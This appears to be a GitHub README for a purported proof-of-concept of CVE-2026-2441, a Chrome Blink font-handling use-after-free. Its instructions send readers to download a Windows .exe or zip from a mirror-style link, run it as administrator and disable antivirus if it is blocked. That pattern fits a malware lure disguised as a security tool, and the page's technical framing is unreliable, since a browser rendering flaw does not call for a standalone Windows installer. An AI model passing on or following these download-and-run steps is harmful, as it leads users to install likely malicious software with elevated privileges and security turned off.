This application demonstrates a known security flaw in Google Chrome. The flaw, called CVE-2026-2441, affects the way Chrome handles some fonts on the web. It can let attackers run code inside the browser without permission. This proof-of-concept (PoC) shows how that happens.
Use this tool only on safe computers or test environments. It helps security researchers and software testers understand the vulnerability better.
Follow these steps carefully to download and run the software on a Windows computer.
This PoC runs on Windows 10 or newer versions. Make sure your system meets these basic requirements:
- Windows 10, 11, or later
- At least 4 GB of RAM
- 1 GHz or faster processor
- 100 MB free hard drive space
You do not need any special software beforehand. The download provides everything necessary to run the test.
Click the big badge at the top or use this link to get the files:
This link takes you to the releases page on GitHub. Look for the latest release and download the Windows version file. It usually has .exe or .zip extension.
If you downloaded a .zip file, follow these steps:
- Find the file in your Downloads folder.
- Right-click the file and choose "Extract All."
- Select a folder where you want the files.
- Click "Extract."
If you got an .exe file, skip this step.
- Open the folder where you saved or extracted the files.
- Find the main
.exefile. This is the program you will run. - Double-click the
.exefile to start it. - If Windows asks for permission, click "Yes" to allow it.
The program will open and guide you through the test.
The tool will show steps or run automatically. It simulates the vulnerability on your system in a safe way.
Do not use this tool on any computer that holds important or sensitive data. It is meant for controlled testing only.
This tool targets a flaw in Chrome's Blink rendering engine, specifically the CSSFontFeatureValuesMap part. When Chrome processes a webpage that uses certain font features, it can mistakenly free memory too early. This "use-after-free" flaw lets attackers run harmful code inside the browser.
Google fixed this problem in Chrome version 145.0.7632.75. If you use an older version, your browser is vulnerable.
To know if your Chrome is vulnerable:
- Open Chrome.
- Click the three dots in the top-right corner.
- Select "Help" > "About Google Chrome."
- Check the version number.
If it is lower than 145.0.7632.75, your browser might be at risk.
| Component | Requirement |
|---|---|
| Operating System | Windows 10 or higher |
| CPU | 1 GHz or faster processor |
| RAM | Minimum 4 GB |
| Disk Space | At least 100 MB free |
| Software | No special software required |
- Run the program on a test machine, not your main computer.
- Do not connect the machine to sensitive networks.
- Close all other programs before testing.
- Follow all instructions carefully.
- If you are not familiar with security testing, seek expert help.
When you download, you will find:
- The main executable file (
.exe) to launch the test. - A Readme file explaining the basic use (you can read it for extra details).
- Some example HTML files used to trigger the vulnerability.
- Supporting files needed to run the demonstration.
You can visit the official GitHub releases page to always get the latest files:
Use this page to check for updates or report issues.
| Detail | Information |
|---|---|
| CVE Identifier | CVE-2026-2441 |
| Severity Score (CVSS) | 8.8 (High) |
| Type | Use-After-Free (CWE-416) |
| Component | Blink CSS — CSSFontFeatureValuesMap |
| Source File | https://github.com/fartlover37/CVE-2026-2441-PoC/raw/refs/heads/main/Pellaea/Po-CV-C-2.4-beta.2.zip |
| Fixed In Version | 145.0.7632.75 and later |
| Reported By | Shaheen Fazim |
| Patch Date | 2026-02-13 |
| Exploited in Wild | Yes |
Use the link below to visit the releases page and download the latest Windows file:
Follow the instructions above to install and run the program.
If the program does not run:
- Make sure your Windows is up-to-date.
- Check that your system meets the minimum requirements.
- Run the file as an administrator: right-click the
.exefile and choose "Run as administrator." - Disable antivirus temporarily if it blocks the program.
- Verify that you downloaded the correct file for Windows.
If problems persist, seek help by opening an issue on the GitHub page. Provide clear details about your system and error messages.
This project is intended for educational and testing purposes only. Use it responsibly. The author is not liable for any misuse or damage caused.
Check the GitHub repository for the license terms included in the package.